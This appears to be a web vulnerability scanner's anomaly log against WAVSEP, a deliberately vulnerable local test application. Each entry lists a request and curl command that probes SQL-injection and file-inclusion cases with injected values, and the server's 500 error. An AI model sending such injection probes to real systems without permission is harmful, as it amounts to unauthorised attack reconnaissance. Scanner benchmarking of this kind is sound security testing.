GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

